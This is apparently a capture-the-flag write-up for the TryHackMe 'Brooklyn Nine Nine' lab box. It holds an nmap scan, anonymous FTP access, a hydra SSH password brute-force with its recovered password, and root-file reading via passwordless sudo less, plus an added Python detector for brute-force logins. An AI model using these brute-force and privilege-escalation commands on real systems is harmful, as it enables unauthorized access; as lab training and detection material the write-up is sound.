TryHackMe-Brooklyn Nine Nine

Published 2023-09-28, 288 views


Introduction:

This room is aimed at beginner hackers, but anyone can try to crack this box. There are two main ways to root it.

Room link:

https://tryhackme.com/room/brooklynninenine#

Questions:

Starting the challenge:

First, scan the ports

└─# nmap -sC -sV 10.10.129.244
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-28 07:02 UTC
Nmap scan report for ip-10-10-129-244.eu-west-1.compute.internal (10.10.129.244)
Host is up (0.0051s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             119 May 17  2020 note_to_jake.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.101.255
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 167f2ffe0fba98777d6d3eb62572c6a3 (RSA)
|   256 2e3b61594bc429b5e858396f6fe99bee (ECDSA)
|_  256 ab162e79203c9b0a019c8c4426015804 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 02:7C:CE:CE:E4:E1 (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.22 seconds

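As the scan shows, FTP allows anonymous login, and there is one file on the server
Download it locally and take a look

It contains a hint

The note says that jake's password is too weak
So we can try brute-forcing SSH
Here we use hydra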

└─# hydra -l jake -w 10 -P /usr/share/wordlists/rockyou.txt -t 10 -f 10.10.129.244 ssh
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-28 07:16:45
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344399 login tries (l:1/p:14344399), ~1434440 tries per task
[DATA] attacking ssh://10.10.129.244:22/
[22][ssh] host: 10.10.129.244   login: jake   password: 987654321
[STATUS] attack finished for 10.10.129.244 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-28 07:16:57

The password was brute-forced successfully
Try logging in over SSH; the login succeeds
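
Seen from the defender's side, a run like the one above leaves a recognisable trace in the target's sshd log: a burst of failed passwords from one address, then an accepted one. The detection below is an added example, not part of the original write-up; the log lines, the hostname `target`, the second client address and the threshold and window values are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: sshd auth.log lines of the kind a parallel password-guessing run leaves.
SAMPLE_LOG = """\
Sep 28 07:16:46 target sshd[1501]: Failed password for jake from 10.10.101.255 port 40122 ssh2
Sep 28 07:16:46 target sshd[1502]: Failed password for jake from 10.10.101.255 port 40124 ssh2
Sep 28 07:16:47 target sshd[1503]: Failed password for jake from 10.10.101.255 port 40126 ssh2
Sep 28 07:16:49 target sshd[1504]: Failed password for jake from 10.10.101.255 port 40128 ssh2
Sep 28 07:16:50 target sshd[1505]: Failed password for jake from 10.10.101.255 port 40130 ssh2
Sep 28 07:16:52 target sshd[1506]: Failed password for jake from 10.10.101.255 port 40132 ssh2
Sep 28 07:16:54 target sshd[1507]: Failed password for jake from 10.10.101.255 port 40134 ssh2
Sep 28 07:16:56 target sshd[1508]: Accepted password for jake from 10.10.101.255 port 40136 ssh2
Sep 28 07:20:03 target sshd[1620]: Failed password for holt from 10.10.5.20 port 51710 ssh2
Sep 28 07:20:10 target sshd[1620]: Accepted password for holt from 10.10.5.20 port 51710 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def find_bruteforce_logins(log_text, threshold=5, window=timedelta(seconds=60), year=2023):
    """Return (ip, user, failures) for every accepted login that was preceded by
    at least `threshold` failed passwords from the same IP within `window`."""
    failures = defaultdict(list)  # source IP -> timestamps of failed attempts
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")  # syslog omits the year
        ip = m["ip"]
        if m["result"] == "Failed":
            failures[ip].append(ts)
            continue
        # Accepted login: count the failures from this IP that fall inside the window.
        recent = [t for t in failures[ip] if ts - t <= window]
        if len(recent) >= threshold:
            alerts.append((ip, m["user"], len(recent)))
        failures[ip].clear()
    return alerts

if __name__ == "__main__":
    print(find_bruteforce_logins(SAMPLE_LOG))
```

A single mistyped password followed by a good login, as in the last two sample lines, stays below the threshold and is not reported.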

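Looking at the users, there are three of them

The user flag is found under the holt user

Next, try privilege escalation

We can see that less can be run with sudo without a password
I looked up how it can be used

Read the root flag directly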
sudo less /root/root.txt
root.txt is read successfully

Of course, privilege escalation via SUID also works

less /root/root.txt

Last updated 2023-09-28